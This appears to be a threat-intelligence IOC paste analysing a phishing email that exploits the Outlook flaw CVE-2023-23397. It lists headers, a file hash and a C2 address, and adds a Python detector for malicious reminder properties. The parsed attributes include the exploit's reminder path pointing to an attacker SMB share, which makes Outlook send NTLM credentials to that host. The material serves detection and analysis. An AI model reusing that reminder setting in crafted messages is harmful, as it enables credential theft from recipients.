- #IOC #OptiData #VR #MSOutlook #EoP #SMB #NTLM
- https://pastebin.com/FJDa0MA8
- FAQ:
- https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
- https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2023-exchange-server-security-updates/ba-p/3764224
- https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/
- attack_vector
- --------------
- email attach lrmng.txt > CVE-2023-23397 exploit > Outlook Task > \\85.195.206.7\lrmng\ > NTLM negotiation request > exfil of NTLM credentials
- # # # # # # # #
- email_headers
- # # # # # # # #
- Return-Path: <officedip@alsaeedi.com>
- Received: from semf03.mfg.siteprotect.com (semf03.mfg.siteprotect.com [64.26.60.166])
- Received: from smtpauth02.mfg.siteprotect.com ([64.26.60.151])
- Received: from [127.0.0.1] (unknown [85.195.206.7])
- Content-Type: application/ms-tnef; name=lrmng.txt
- Content-Transfer-Encoding: base64
- Content-Disposition: attachment; filename=lrmng.txt
- From: officedip@alsaeedi.com
- Subject: Alarm!
- Message-ID: <37a46b6c-fe82-4e9f-a6c2-29a2d49fe99a@alsaeedi.com>
- Date: Thu, 16 Mar 2023 09:50:29 +0000
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444
- File name lrmng.txt [CVE-2023-23397 exploit]
- File size 6.94 KB (7108 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR email attach
- C2 85.195.206.7:445
- netwrk
- --------------
- 85.195.206.7 445 SMB Negotiate Protocol Request
- comp
- --------------
- System 85-195-206-7.init7.net 445 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office*\OUTLOOK.EXE
- persist
- --------------
- n/a
- drop
- --------------
- n/a
- # # # # # # # #
- additional info
- # # # # # # # #
- TNEF parsed
- --------------
- "attributes": {
- "Date Modified": "2022-06-07 07:56:42",
- "Date Received": "2023-02-07 09:54:49",
- "Date Sent": "2023-02-07 09:54:49",
- "From": [
- "Joe.Smith@cert.au",
- "EX",
- "/o=BLIND/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=71ecf18295c14e82bcf212b9c8722a0e-Joe.Smith@cert.au"
- ],
- "Message Class": "IPM.Task",
- "Message ID": "14DBDC85E2926A4291B27D5C13103DBE",
- "Message Status": 33,
- "Priority": 1,
- "Subject": "ALARM!"
- },
- "extended_attributes": {
- "0x8103": false,
- "0x8112": 2,
- "0x8113": 1,
- "0x811c": false,
- "0x8123": -1000,
- "0x8124": false,
- "0x8127": "",
- "0x812a": 0,
- "0x812c": false,
- "0x851e": true,
- "0x851f": "\\\\85.195.206.7\\lrmng",
- "0x8580": "Joe.Smith@cert.au",
- "0x8581": "00000002\u0001/o=CERT/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=71ecf18295c14e82bcf212b9c8722a0e-Joe.Smith@cert.au",
- "0x85eb": 1033,
- "InTransitMessageCorrelator": "3\ufffd\ufffd\ufffd(u$K\ufffdus>\ufffdw(\ufffd",
- "MAPI_ACCESS": 7,
- "MAPI_ACCESS_LEVEL": 1,
- "MAPI_AGING_DONT_AGE_ME": false,
- "MAPI_ALTERNATE_RECIPIENT_ALLOWED": true,
- "MAPI_ANNIVERSARY_EVENT_ENTRY_ID": "",
- "MAPI_AUTO_LOG": 0,
- "MAPI_BIRTHDAY_EVENT_ENTRY_ID": "Joe.Smith@cert.au",
- "MAPI_CHANGE_KEY": "\ufffd\u001e'M\u000e\ufffd\ufffdH\ufffd\ufffdK\ufffd1\ufffd-o\u0000\u0000\u0000\u0000\u001a\ufffd",
- "MAPI_CLIENT_SUBMIT_TIME": "2023-02-07 16:54:49.696000",
- "MAPI_CONTACT_USER_FIELD1": 0,
- "MAPI_CONVERSATION_INDEX": "\u0001\ufffd;\u0014\ufffdK>\ufffd\ufffd\ufffd\u0013x@\ufffd\ufffd\b\ufffd/\ufffd\ufffd\ufffd\ufffd",
- "MAPI_CONVERSATION_INDEX_TRACKING": true,
- "MAPI_CONVERSATION_TOPIC": "LGBTQ+",
- "MAPI_CREATION_TIME": "2023-02-07 16:53:29.210000",
- "MAPI_CURRENT_VERSION_NAME": "16.0",
- "MAPI_DELETE_AFTER_SUBMIT": false,
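A defender-side check for the two named properties that carry this exploit, 0x851e (PidLidReminderOverride) and 0x851f (PidLidReminderFileParameter), as they appear in the parsed TNEF attributes above. This is an added example, not code from the original paste or from Microsoft's CSS-Exchange script; the attribute key names, the trusted-suffix list and the sample dictionary are assumptions built from the parsed output.

```python
import ipaddress
import re
from typing import Optional

# Named-property IDs as the TNEF parser above labels them (assumption: same keys).
REMINDER_OVERRIDE = "0x851e"        # PidLidReminderOverride
REMINDER_FILE_PARAMETER = "0x851f"  # PidLidReminderFileParameter

# Matches "\\host\share..." and "\\?\UNC\host\share..."; group 1 is the host.
# A WebDAV-style "@port" or "@SSL" suffix after the host is tolerated.
UNC_RE = re.compile(r"^\\\\(?:\?\\UNC\\)?([^\\@]+)(?:@[^\\]+)?\\", re.IGNORECASE)


def unc_host(path: str) -> Optional[str]:
    """Return the host part of a UNC path, or None when the value is not a UNC path."""
    m = UNC_RE.match(path)
    return m.group(1) if m else None


def is_external_host(host: str, internal_suffixes=()) -> bool:
    """True unless the host is a non-global IP or ends with a trusted DNS suffix."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        suffixes = tuple(s.lower() for s in internal_suffixes)
        return not host.lower().endswith(suffixes)


def check_reminder_attrs(ext_attrs: dict, internal_suffixes=("corp.example",)) -> Optional[str]:
    """Flag a MAPI item whose custom reminder sound path would make Outlook
    authenticate to a remote SMB/WebDAV host. Returns a finding, or None if benign."""
    override = ext_attrs.get(REMINDER_OVERRIDE)
    param = ext_attrs.get(REMINDER_FILE_PARAMETER)
    if not override or not isinstance(param, str) or not param:
        return None  # no custom reminder sound, nothing for Outlook to fetch
    host = unc_host(param)
    if host is None:
        return None  # local path such as C:\Windows\Media\Alarm01.wav
    verdict = "external" if is_external_host(host, internal_suffixes) else "internal"
    return f"ReminderFileParameter points to {verdict} UNC host {host!r}: {param}"


# Constructed sample: the two attributes exactly as parsed from lrmng.txt above.
SAMPLE_ATTRS = {"0x851e": True, "0x851f": "\\\\85.195.206.7\\lrmng"}
```

Items flagged as pointing at an internal host still deserve a look, since a compromised internal file share serves the same purpose; the external verdict is the one that matches this sample.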
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444/details
- VR